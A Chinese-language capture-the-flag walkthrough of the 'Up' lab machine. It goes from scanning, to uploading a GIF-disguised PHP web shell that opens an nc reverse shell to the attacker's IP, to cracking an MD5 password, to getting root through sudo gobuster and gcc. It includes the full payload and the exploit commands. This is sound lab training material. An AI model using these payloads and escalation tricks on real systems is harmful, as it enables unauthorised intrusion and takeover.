Up
Up
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali💀kali)-[~/temp/Up]
└─$ sudo rustscan -a $IP -- -Pn -sCV
Open 192.168.10.102:80
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: RodGar - Subir Imagen
MAC Address: 08:00:27:F2:3C:F4 (Oracle VirtualBox virtual NIC)
先扫到这,如果没东西再试试udp
。
目录扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali💀kali)-[~/temp/Up]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.102
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 301,401,403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 4489]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
漏洞发现
踩点
1
2
3
4
5
6
7
┌──(kali💀kali)-[~/temp/Up]
└─$ curl -s http://$IP | html2text
****** Sube tu Imagen ******
Haz clic para subir un archivo [File] Subir Imagen
© RodGar
西班牙语?翻译一下:
难道就是一个简单的上传反弹 shell ?我们再继续看一下敏感目录,看看有没有上传路径吧,尝试一下:
1
2
3
4
5
6
┌──(kali💀kali)-[~/temp/Up]
└─$ curl -s http://$IP/uploads | html2text
****** Moved Permanently ******
The document has moved here.
===============================================================================
Apache/2.4.62 (Debian) Server at 192.168.10.102 Port 80
原来是一个301,被过滤掉了,为了防止遗漏信息,重新扫描一下:
中间遇到一个有意思的报错,大致如下:
1 2 3 4 5 6 7 8 9 10 11 ┌──(kali💀kali)-[~/temp/Up] └─$ sudo apt-get update Get:1 https://mirrors.ustc.edu.cn/kali kali-rolling InRelease [41.5 kB] Err:1 https://mirrors.ustc.edu.cn/kali kali-rolling InRelease The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED65462EC8D5E4C5 Reading package lists... Done W: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: https://mirrors.ustc.edu.cn/kali kali-rolling InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED65462EC8D5E4C5 W: Failed to fetch https://mirrors.ustc.edu.cn/kali/dists/kali-rolling/InRelease The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED65462EC8D5E4C5 W: Some index files failed to download. They have been ignored, or old ones used instead. N: Repository 'Kali Linux' changed its 'non-free component' value from 'non-free' to 'non-free non-free-firmware' N: More information about this can be found online at: https://www.kali.org/blog/non-free-firmware-transition/可能是由于系统缺少中科大镜像源的GPG公钥,导致APT无法验证软件包的完整性,尝试解决:
1 2 3 4 5 6 7 ┌──(kali💀kali)-[~/temp/Up] └─$ sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys ED65462EC8D5E4C5 Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)). Executing: /tmp/apt-key-gpghome.hgs7wruPJi/gpg.1.sh --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys ED65462EC8D5E4C5 gpg: key ED65462EC8D5E4C5: public key "Kali Linux Archive Automatic Signing Key (2025) <devel@kali.org>" imported gpg: Total number processed: 1 gpg: imported: 1顺利解决问题。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali💀kali)-[~/temp/Up]
└─$ gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -b 401,403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.102/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 401,403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 4489]
/uploads (Status: 301) [Size: 318] [--> http://192.168.10.102/uploads/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.10.102/javascript/]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
没扫到更多了,递归扫描一下吧:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali💀kali)-[~/temp/Up]
└─$ feroxbuster -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200 301 302
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.10.102/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 301, 302]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 150l 388w 4489c http://192.168.10.102/
301 GET 9l 28w 318c http://192.168.10.102/uploads => http://192.168.10.102/uploads/
301 GET 9l 28w 321c http://192.168.10.102/javascript => http://192.168.10.102/javascript/
301 GET 9l 28w 331c http://192.168.10.102/javascript/clipboard => http://192.168.10.102/javascript/clipboard/
200 GET 858l 3081w 26377c http://192.168.10.102/javascript/clipboard/clipboard
301 GET 9l 28w 328c http://192.168.10.102/javascript/jquery => http://192.168.10.102/javascript/jquery/
200 GET 10907l 44549w 289782c http://192.168.10.102/javascript/jquery/jquery
尝试上传,尝试.jpg
但是失败了:
尝试修改后缀为.gif
依然失败,抓包上传试试:
依旧失败,再翻翻。。。。
在uploads
目录下看到了:
其他几个目录没有发现有啥有用信息,尝试重新信息搜集一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali💀kali)-[~/temp/Up]
└─$ feroxbuster -u http://$IP/ -s 200 301 302 -x txt php html
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.10.102/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 301, 302]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [txt, php, html]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301 GET 9l 28w 318c http://192.168.10.102/uploads => http://192.168.10.102/uploads/
301 GET 9l 28w 321c http://192.168.10.102/javascript => http://192.168.10.102/javascript/
200 GET 150l 388w 4489c http://192.168.10.102/
200 GET 150l 388w 4489c http://192.168.10.102/index.php
301 GET 9l 28w 328c http://192.168.10.102/javascript/jquery => http://192.168.10.102/javascript/jquery/
200 GET 10907l 44549w 289782c http://192.168.10.102/javascript/jquery/jquery
200 GET 1l 1w 1301c http://192.168.10.102/uploads/robots.txt
301 GET 9l 28w 331c http://192.168.10.102/javascript/clipboard => http://192.168.10.102/javascript/clipboard/
200 GET 858l 3081w 26377c http://192.168.10.102/javascript/clipboard/clipboard
[####################] - 6m 600076/600076 0s found:9 errors:172
[####################] - 6m 120000/120000 359/s http://192.168.10.102/
[####################] - 6m 120000/120000 354/s http://192.168.10.102/uploads/
[####################] - 6m 120000/120000 354/s http://192.168.10.102/javascript/
[####################] - 5m 120000/120000 364/s http://192.168.10.102/javascript/jquery/
[####################] - 5m 120000/120000 434/s http://192.168.10.102/javascript/clipboard/
文件上传
拿到关键目录,尝试进行测试:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali💀kali)-[~/temp/Up]
└─$ curl -s http://$IP/uploads/robots.txt
PD9waHAKaWYgKCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddID09PSAnUE9TVCcpIHsKICAgICR0YXJnZXREaXIgPSAidXBsb2Fkcy8iOwogICAgJGZpbGVOYW1lID0gYmFzZW5hbWUoJF9GSUxFU1siaW1hZ2UiXVsibmFtZSJdKTsKICAgICRmaWxlVHlwZSA9IHBhdGhpbmZvKCRmaWxlTmFtZSwgUEFUSElORk9fRVhURU5TSU9OKTsKICAgICRmaWxlQmFzZU5hbWUgPSBwYXRoaW5mbygkZmlsZU5hbWUsIFBBVEhJTkZPX0ZJTEVOQU1FKTsKCiAgICAkYWxsb3dlZFR5cGVzID0gWydqcGcnLCAnanBlZycsICdnaWYnXTsKICAgIGlmIChpbl9hcnJheShzdHJ0b2xvd2VyKCRmaWxlVHlwZSksICRhbGxvd2VkVHlwZXMpKSB7CiAgICAgICAgJGVuY3J5cHRlZEZpbGVOYW1lID0gc3RydHIoJGZpbGVCYXNlTmFtZSwgCiAgICAgICAgICAgICdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6JywgCiAgICAgICAgICAgICdOT1BRUlNUVVZXWFlaQUJDREVGR0hJSktMTW5vcHFyc3R1dnd4eXphYmNkZWZnaGlqa2xtJyk7CgogICAgICAgICRuZXdGaWxlTmFtZSA9ICRlbmNyeXB0ZWRGaWxlTmFtZSAuICIuIiAuICRmaWxlVHlwZTsKICAgICAgICAkdGFyZ2V0RmlsZVBhdGggPSAkdGFyZ2V0RGlyIC4gJG5ld0ZpbGVOYW1lOwoKICAgICAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImltYWdlIl1bInRtcF9uYW1lIl0sICR0YXJnZXRGaWxlUGF0aCkpIHsKICAgICAgICAgICAgJG1lc3NhZ2UgPSAiRWwgYXJjaGl2byBzZSBoYSBzdWJpZG8gY29ycmVjdGFtZW50ZS4iOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICRtZXNzYWdlID0gIkh1Ym8gdW4gZXJyb3IgYWwgc3ViaXIgZWwgYXJjaGl2by4iOwogICAgICAgIH0KICAgIH0gZWxzZSB7CiAgICAgICAgJG1lc3NhZ2UgPSAiU29sbyBzZSBwZXJtaXRlbiBhcmNoaXZvcyBKUEcgeSBHSUYuIjsKICAgIH0KfQo/Pgo=
┌──(kali💀kali)-[~/temp/Up]
└─$ curl -s http://$IP/uploads/robots.txt | base64 -d
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$targetDir = "uploads/";
$fileName = basename($_FILES["image"]["name"]);
$fileType = pathinfo($fileName, PATHINFO_EXTENSION);
$fileBaseName = pathinfo($fileName, PATHINFO_FILENAME);
$allowedTypes = ['jpg', 'jpeg', 'gif'];
if (in_array(strtolower($fileType), $allowedTypes)) {
$encryptedFileName = strtr($fileBaseName,
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm');
$newFileName = $encryptedFileName . "." . $fileType;
$targetFilePath = $targetDir . $newFileName;
if (move_uploaded_file($_FILES["image"]["tmp_name"], $targetFilePath)) {
$message = "El archivo se ha subido correctamente.";
} else {
$message = "Hubo un error al subir el archivo.";
}
} else {
$message = "Solo se permiten archivos JPG y GIF.";
}
}
?>
把源代码给翻出来了。。。。之前为啥没上传成功?难道是因为我传上去的4k高清动漫御姐图太大了吗?尝试删除部分内容看看能不能上传。。。。
好吧,这个靶机好不解风情。。。。
审计一下源码发现是一个rot13
加密,这很简单,尝试上传反弹shell:
先准备一个反弹shell
1
2
3
4
5
6
7
8
9
10
┌──(kali💀kali)-[~/temp/Up]
└─$ echo 'GIF89a' > a.gif
┌──(kali💀kali)-[~/temp/Up]
└─$ echo "<?php system('nc -e /bin/bash 192.168.10.101 1234');?>" >> a.gif
┌──(kali💀kali)-[~/temp/Up]
└─$ cat a.gif
GIF89a
<?php system('nc -e /bin/bash 192.168.10.101 1234');?>
尝试上传
中间发现前端也有提示:
尝试上传以后在访问一下,就弹回来了!
1
2
3
┌──(kali💀kali)-[~/temp/Up]
└─$ curl -s http://$IP/uploads/n.gif
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
(remote) www-data@debian:/var/www/html/uploads$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@debian:/var/www/html/uploads$ awk -F: '{print $1}' /etc/passwd
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
_apt
nobody
systemd-network
tss
systemd-timesync
messagebus
usbmux
dnsmasq
avahi
speech-dispatcher
fwupd-refresh
saned
geoclue
polkitd
rtkit
colord
gnome-initial-setup
Debian-gdm
rodgar
(remote) www-data@debian:/var/www/html/uploads$ ls -la /home/
total 12
drwxr-xr-x 3 root root 4096 Oct 22 2024 .
drwxr-xr-x 20 root root 4096 Oct 22 2024 ..
drwxr-xr-x 3 rodgar rodgar 4096 Oct 22 2024 rodgar
(remote) www-data@debian:/var/www/html/uploads$ cd /home/rodgar/
(remote) www-data@debian:/home/rodgar$ ls -la
total 36
drwxr-xr-x 3 rodgar rodgar 4096 Oct 22 2024 .
drwxr-xr-x 3 root root 4096 Oct 22 2024 ..
-rw------- 1 rodgar rodgar 0 Oct 22 2024 .bash_history
-rw-r--r-- 1 rodgar rodgar 220 Mar 29 2024 .bash_logout
-rw-r--r-- 1 rodgar rodgar 3526 Mar 29 2024 .bashrc
-rw-r--r-- 1 rodgar rodgar 5290 Jul 12 2023 .face
lrwxrwxrwx 1 rodgar rodgar 5 Jul 12 2023 .face.icon -> .face
drwxr-xr-x 3 rodgar rodgar 4096 Oct 22 2024 .local
-rw-r--r-- 1 rodgar rodgar 807 Mar 29 2024 .profile
-rw-r--r-- 1 rodgar rodgar 24 Oct 22 2024 user.txt
(remote) www-data@debian:/home/rodgar$ cat user.txt
b45cffe084dd3d20d928bee
(remote) www-data@debian:/home/rodgar$ sudo -l
Matching Defaults entries for www-data on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User www-data may run the following commands on debian:
(ALL) NOPASSWD: /usr/bin/gobuster
(remote) www-data@debian:/home/rodgar$ find / -type f -perm -u=s 2>/dev/null
/usr/bin/chfn
/usr/bin/su
/usr/bin/passwd
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/ntfs-3g
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mount
/usr/bin/vmware-user-suid-wrapper
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/xorg/Xorg.wrap
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/snap/core/17200/bin/mount
/snap/core/17200/bin/ping
/snap/core/17200/bin/ping6
/snap/core/17200/bin/su
/snap/core/17200/bin/umount
/snap/core/17200/usr/bin/chfn
/snap/core/17200/usr/bin/chsh
/snap/core/17200/usr/bin/gpasswd
/snap/core/17200/usr/bin/newgrp
/snap/core/17200/usr/bin/passwd
/snap/core/17200/usr/bin/sudo
/snap/core/17200/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/17200/usr/lib/openssh/ssh-keysign
/snap/core/17200/usr/lib/snapd/snap-confine
/snap/core/17200/usr/sbin/pppd
/snap/core/17210/bin/mount
/snap/core/17210/bin/ping
/snap/core/17210/bin/ping6
/snap/core/17210/bin/su
/snap/core/17210/bin/umount
/snap/core/17210/usr/bin/chfn
/snap/core/17210/usr/bin/chsh
/snap/core/17210/usr/bin/gpasswd
/snap/core/17210/usr/bin/newgrp
/snap/core/17210/usr/bin/passwd
/snap/core/17210/usr/bin/sudo
/snap/core/17210/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/17210/usr/lib/openssh/ssh-keysign
/snap/core/17210/usr/lib/snapd/snap-confine
/snap/core/17210/usr/sbin/pppd
(remote) www-data@debian:/home/rodgar$ cd ~
(remote) www-data@debian:/var/www$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Oct 13 2024 .
drwxr-xr-x 13 root root 4096 Oct 22 2024 ..
drwxr-xr-x 3 www-data www-data 4096 Oct 22 2024 html
(remote) www-data@debian:/var/www$ cd html
(remote) www-data@debian:/var/www/html$ ls -la
total 1324
drwxr-xr-x 3 www-data www-data 4096 Oct 22 2024 .
drwxr-xr-x 3 root root 4096 Oct 13 2024 ..
-rw-r--r-- 1 root root 37 Oct 22 2024 .htaccess
-rw-r--r-- 1 root root 6031 Oct 22 2024 index.php
-rw-r--r-- 1 root root 1330919 Oct 22 2024 sh.jpg
drwxr-xr-x 2 www-data www-data 4096 Jun 6 01:49 uploads
(remote) www-data@debian:/var/www/html$ cat sh.jpg | head -n 10
----------
cat: write error: Broken pipe
(remote) www-data@debian:/var/www/html$ cat .htaccess
AddType application/x-httpd-php .gif
(remote) www-data@debian:/var/www/html$ cd uploads
(remote) www-data@debian:/var/www/html/uploads$ ls -la
total 32
drwxr-xr-x 2 www-data www-data 4096 Jun 6 01:49 .
drwxr-xr-x 3 www-data www-data 4096 Oct 22 2024 ..
-rw-r--r-- 1 www-data www-data 63 Oct 20 2024 .htaccess
-rw-r--r-- 1 root root 964 Oct 22 2024 access_denied.html
-rw-r--r-- 1 root root 17 Oct 22 2024 clue.txt
-rw-r--r-- 1 www-data www-data 12 Jun 6 01:31 grfg.gif
-rw-r--r-- 1 www-data www-data 62 Jun 6 01:49 n.gif
-rw-r--r-- 1 root root 1301 Oct 22 2024 robots.txt
(remote) www-data@debian:/var/www/html/uploads$ cat clue.txt
/root/rodgarpass
(remote) www-data@debian:/var/www/html/uploads$ ls -la /root/rodgarpass
ls: cannot access '/root/rodgarpass': Permission denied
(remote) www-data@debian:/var/www/html/uploads$ cat .htaccess
Options -Indexes
ErrorDocument 403 /uploads/access_denied.html
发现了一个奇怪的文件显示了一个更奇怪的文件/root/rodgarpass
看起来有点像rodgar
用户的密码,根据刚刚找到的用户来看确实存在一个名为rodgar的用户,现在就是要找到这个密码了,尝试一下。
gobuster提取文件内容
发现可以使用gobuster
,看一下使用方式能不能从之得到相关的内容!由于gobuster是扫描工具,且本地只存在一个网站,尝试使用密码文件作为字典进行扫描,然后不对扫描结果进行过滤,得到密码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
(remote) www-data@debian:/tmp$ /usr/bin/gobuster -h
Usage:
gobuster [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
dir Uses directory/file enumeration mode
dns Uses DNS subdomain enumeration mode
fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body
gcs Uses gcs bucket enumeration mode
help Help about any command
s3 Uses aws bucket enumeration mode
tftp Uses TFTP enumeration mode
version shows the current version
vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)
Flags:
--delay duration Time each thread waits between requests (e.g. 1500ms)
-h, --help help for gobuster
--no-color Disable color output
--no-error Don't display errors
-z, --no-progress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-p, --pattern string File containing replacement patterns
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist
Use "gobuster [command] --help" for more information about a command.
(remote) www-data@debian:/tmp$ sudo gobuster dir -u http://127.0.0.1 -w /root/rodgarpass -v
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /root/rodgarpass
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Verbose: true
[+] Timeout: 10s
===============================================================
2025/06/06 02:13:32 Starting gobuster in directory enumeration mode
===============================================================
Missed: /b45cffe084dd3d20d928bee85e7b0f2 (Status: 404) [Size: 271]
===============================================================
2025/06/06 02:13:32 Finished
===============================================================
也可以用来扫描本地服务器,观察扫描内容:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
(remote) www-data@debian:/tmp$ sudo gobuster dir -u http://192.168.10.101:8888 -w /root/rodgarpass
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.101:8888
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /root/rodgarpass
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2025/06/06 02:15:24 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.10.101:8888/fb142dce-9df8-40aa-a617-1adc4232186c => 302 (Length: 189). To continue please exclude the status code or the length
破译密码
这个密码看上去不像是明文,最大为f是16进制,可能是hash,但是也不排除是密码,尝试切换,发现失败。。。。
1
2
3
(remote) www-data@debian:/tmp$ su rodgar
Password:
su: Authentication failure
发现了密码为string
,但是登录仍然失败。。。。。然后发现:
1
2
3
┌──(kali💀kali)-[~/temp/Up]
└─$ echo -n "string" | md5sum
b45cffe084dd3d20d928bee85e7b0f21 -
这里应该作者是想我们对最后一个字符串进行枚举的。。。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
┌──(kali💀kali)-[~/temp/Up]
└─$ for last_char in {0..9} {a..f}; do echo "b45cffe084dd3d20d928bee85e7b0f2$last_char" >> hash; done
┌──(kali💀kali)-[~/temp/Up]
└─$ cat hash
b45cffe084dd3d20d928bee85e7b0f20
b45cffe084dd3d20d928bee85e7b0f21
b45cffe084dd3d20d928bee85e7b0f22
b45cffe084dd3d20d928bee85e7b0f23
b45cffe084dd3d20d928bee85e7b0f24
b45cffe084dd3d20d928bee85e7b0f25
b45cffe084dd3d20d928bee85e7b0f26
b45cffe084dd3d20d928bee85e7b0f27
b45cffe084dd3d20d928bee85e7b0f28
b45cffe084dd3d20d928bee85e7b0f29
b45cffe084dd3d20d928bee85e7b0f2a
b45cffe084dd3d20d928bee85e7b0f2b
b45cffe084dd3d20d928bee85e7b0f2c
b45cffe084dd3d20d928bee85e7b0f2d
b45cffe084dd3d20d928bee85e7b0f2e
b45cffe084dd3d20d928bee85e7b0f2f
┌──(kali💀kali)-[~/temp/Up]
└─$ hash-identifier b45cffe084dd3d20d928bee85e7b0f20
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
HASH: ^C
Bye!
┌──(kali💀kali)-[~/temp/Up]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=Raw-Md5
Using default input encoding: UTF-8
Loaded 16 password hashes with no different salts (Raw-MD5 [MD5 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
string (?)
1g 0:00:00:01 DONE (2025-06-06 04:32) 0.9090g/s 13039Kp/s 13039Kc/s 195614KC/s fuckyooh21..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
然后尝试用完整的md5进行登录,成功。
gcc make提权root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
rodgar@debian:/tmp$ cd ~
rodgar@debian:~$ whoami;id;ls -la
rodgar
uid=1001(rodgar) gid=1001(rodgar) grupos=1001(rodgar)
total 40
drwxr-xr-x 4 rodgar rodgar 4096 jun 6 02:41 .
drwxr-xr-x 3 root root 4096 oct 22 2024 ..
-rw------- 1 rodgar rodgar 0 oct 22 2024 .bash_history
-rw-r--r-- 1 rodgar rodgar 220 mar 29 2024 .bash_logout
-rw-r--r-- 1 rodgar rodgar 3526 mar 29 2024 .bashrc
drwx------ 3 rodgar rodgar 4096 jun 6 02:41 .cache
-rw-r--r-- 1 rodgar rodgar 5290 jul 12 2023 .face
lrwxrwxrwx 1 rodgar rodgar 5 jul 12 2023 .face.icon -> .face
drwxr-xr-x 4 rodgar rodgar 4096 jun 6 02:41 .local
-rw-r--r-- 1 rodgar rodgar 807 mar 29 2024 .profile
-rw-r--r-- 1 rodgar rodgar 24 oct 22 2024 user.txt
rodgar@debian:~$ sudo -l
Matching Defaults entries for rodgar on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User rodgar may run the following commands on debian:
(ALL : ALL) NOPASSWD: /usr/bin/gcc, /usr/bin/make
根据以下进行提权:
https://gtfobins.github.io/gtfobins/gcc/#sudo
https://gtfobins.github.io/gtfobins/make/#sudo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
rodgar@debian:~$ sudo gcc -wrapper /bin/bash,-s .
root@debian:/home/rodgar# cd ~;ls -la
total 40
drwx------ 5 root root 4096 oct 22 2024 .
drwxr-xr-x 20 root root 4096 oct 22 2024 ..
-rw------- 1 root root 26 oct 22 2024 .bash_history
-rw-r--r-- 1 root root 571 abr 10 2021 .bashrc
drwx------ 2 root root 4096 oct 13 2024 .cache
drwxr-xr-x 3 root root 4096 oct 13 2024 .local
-rw-r--r-- 1 root root 161 jul 9 2019 .profile
-rw-r--r-- 1 root root 32 oct 22 2024 rodgarpass
-rw-r--r-- 1 root root 41 oct 22 2024 rooo_-tt.txt
drwx------ 2 root root 4096 oct 13 2024 .ssh
root@debian:~# cat rooo_-tt.txt
44b3f261e197124e60217d6ffe7e71a8e0175ae0
